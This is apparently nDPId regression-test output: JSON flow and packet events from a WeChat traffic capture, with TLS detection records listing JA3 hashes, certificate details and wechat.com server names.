+00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1492167366908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167366908,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8lZ5AAEAGf57AqAFny82XotNMAbt+X1IbAAAAAKACchBDOAAAAgQFtAQCCAoAMMeFAAAAAAEDAwc="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167367159,"flow_last_seen":1492167367159,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167367159,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378674,"flow_last_seen":1492167378674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378674,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1492167378674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378674,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8mSRAAEAGfBjAqAFny82XotNOAbtKc0omAAAAAKACchBzmgAAAgQFtAQCCAoAMNMCAAAAAAEDAwc="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378926,"flow_last_seen":1492167378926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378926,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
